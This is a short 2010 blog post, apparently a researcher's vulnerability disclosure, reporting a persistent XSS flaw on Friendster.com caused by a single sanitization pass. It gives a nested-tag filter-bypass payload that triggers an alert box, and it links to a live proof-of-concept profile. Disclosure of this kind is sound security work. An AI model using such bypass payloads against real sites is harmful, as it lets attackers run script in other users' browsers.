This site is soon to be deprecated by http://www.johnleitch.net

Thursday, May 6, 2010

Friendster.com Persistent XSS

Only one sanitization pass is performed on user submited data.

Exploit: <<z>script>alert(0)<<z>/script>

PoC: http://profiles.friendster.com/31202727

4 comments: